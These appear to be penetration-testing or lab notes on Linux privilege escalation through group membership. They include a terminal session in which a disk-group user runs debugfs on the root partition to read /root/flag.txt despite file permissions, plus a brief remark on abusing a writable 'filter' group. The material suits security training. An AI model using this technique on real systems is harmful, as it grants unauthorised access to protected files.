Groups

Disk

The disk group in Linux is a privileged system group intended to grant access to raw disk devices, like /dev/sda, /dev/sdb, etc. It allows users to perform low-level operations on storage devices, such as partitioning, formatting, mounting/unmounting, etc.

Membership in the disk group is highly sensitive — users with this access can read or modify any data on the system, bypassing file permissions entirely.

# Confirm group membership
ian@DANTE-NIX07:~$ id
uid=1001(ian) gid=1001(ian) groups=1001(ian),6(disk)

# Identify the root fine system (/)
ian@DANTE-NIX07:~$ df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/sda5        14G  7.9G  5.2G  61% /

# Open the block service
ian@DANTE-NIX07:~$ debugfs /dev/sda5
debugfs 1.45.5 (07-Jan-2020)
No entry for terminal type "xtrem";
using dumb terminal settings.

# Failed attempt to create a directory
debugfs:  mkdir test
mkdir: Filesystem opened read/only

# Read a root file 
debugfs:  cat /root/flag.txt

Filter

The filter group is usually a custom group, not a default Linux group, and it’s commonly used to manage permissions around mail content filtering components. It can be assigned writable access to sensitive files, such as disclaimer files, which can lead to PE.